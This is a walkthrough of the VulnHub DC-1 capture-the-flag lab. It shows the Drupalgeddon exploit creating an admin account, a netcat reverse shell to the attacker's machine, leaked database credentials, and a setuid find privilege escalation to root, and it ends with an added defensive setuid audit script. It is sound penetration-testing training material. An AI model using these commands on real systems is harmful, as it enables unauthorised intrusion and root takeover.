Original Description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
Recon
root@kali:~# nmap -p- -A 10.128.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST
Nmap scan report for DC-1.stoeps.lab (10.128.1.152)
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 42642/tcp status
| 100024 1 49668/udp status
| 100024 1 57477/tcp6 status
|_ 100024 1 57545/udp6 status
42642/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:76:3D:59 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Drupal
searchsploit drupal 7
------------------------------------------------------------------------------------------------------------------
Exploit Title | Path (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
Create Admin account
root@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py .
root@kali:~/vulnhub/dc1# dos2unix 34992.py
root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass
...
[!] VULNERABLE!
[!] Administrator user created!
[*] Login: stoeps
[*] Pass: pass
[*] Url: http://10.128.1.152/?q=node&destination=node
Now we can log in to the Drupal site and install modules, change settings and so on.
Go to: http://10.128.1.152/node/2#overlay-context=shell&overlay=admin/modules
Install https://www.drupal.org/project/shell (use the remote link to the .tar.gz archive in the module installer)
Open Drupal Shell: http://10.128.1.152/shell
Opening netcat shell
Start a listener on Kali:
nc -nlvp 7777
Then start nc in the Drupal shell (use the Kali IP here):
nc -e /bin/bash 10.128.1.154 7777
Then get a real tty:
python -c 'import pty; pty.spawn("/bin/sh")'
Grab the flags through the netcat shell and the browser.
Flag1
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
Flag2
www-data@DC-1:/var/www/sites/default$ cat set
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...
We could extract the usernames and passwords from the MySQL database and crack them with John the Ripper, but that is not needed since we created our own admin account. I found nothing interesting in the database.
Flag3
Article on the dashboard within Drupal.
http://10.128.1.152/node/2#overlay-context=shell
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Flag4
/home/flag4/flag4.txt
> cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
Flag4 was readable for the user www-data, so there was no need to crack the password from /etc/shadow.
Final Flag
www-data@DC-1:/var/www/sites/default$ find / -perm /4000
find / -perm /4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find
ls -l /usr/bin/find
bash-4.2$ find . -exec '/bin/sh' \;
find . -exec '/bin/sh' \;
# whoami
whoami
root
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
thefinalflag.txt
Because find is setuid root, it can be used with -exec to run a command with an effective uid of 0.
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
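The root path above exists only because a general-purpose binary (find) carries the setuid bit. The following is an added example, not part of the original writeup: a small POSIX sh audit that compares the setuid inventory of a host against a baseline and reports anything unexpected. The baseline is a constructed allowlist based on the stock Debian 7 entries seen in the listing above (find deliberately left out); the function names audit_suid_list and audit_suid_live are mine.

```shell
#!/bin/sh
# Added example: setuid audit against a known baseline.
# SUID_BASELINE is a constructed allowlist of setuid binaries expected on a
# stock Debian 7 host; /usr/bin/find is intentionally absent so it gets flagged.
SUID_BASELINE='/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/at
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/procmail
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs'

# audit_suid_list: read one absolute path per line on stdin and print a line
# for every path that is not in the baseline. Prints nothing when all is known.
audit_suid_list() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -F fixed string, -x whole line, -q quiet: exact path match only
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$path"; then
            printf 'UNEXPECTED setuid binary: %s\n' "$path"
        fi
    done
}

# audit_suid_live: enumerate setuid regular files on the local filesystem
# (same idea as the writeup's find / -perm /4000, restricted to one device
# and to regular files) and pipe them through the baseline check.
audit_suid_live() {
    find / -xdev -type f -perm -4000 2>/dev/null | audit_suid_list
}
```

Run audit_suid_live from cron or a configuration-management check; a non-empty report is the signal to review the file's package owner and remove the bit.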
We’re done! A fun VulnHub machine which can be solved in a short time. Looking forward to the other eight machines of that series. Thanks @DCAU7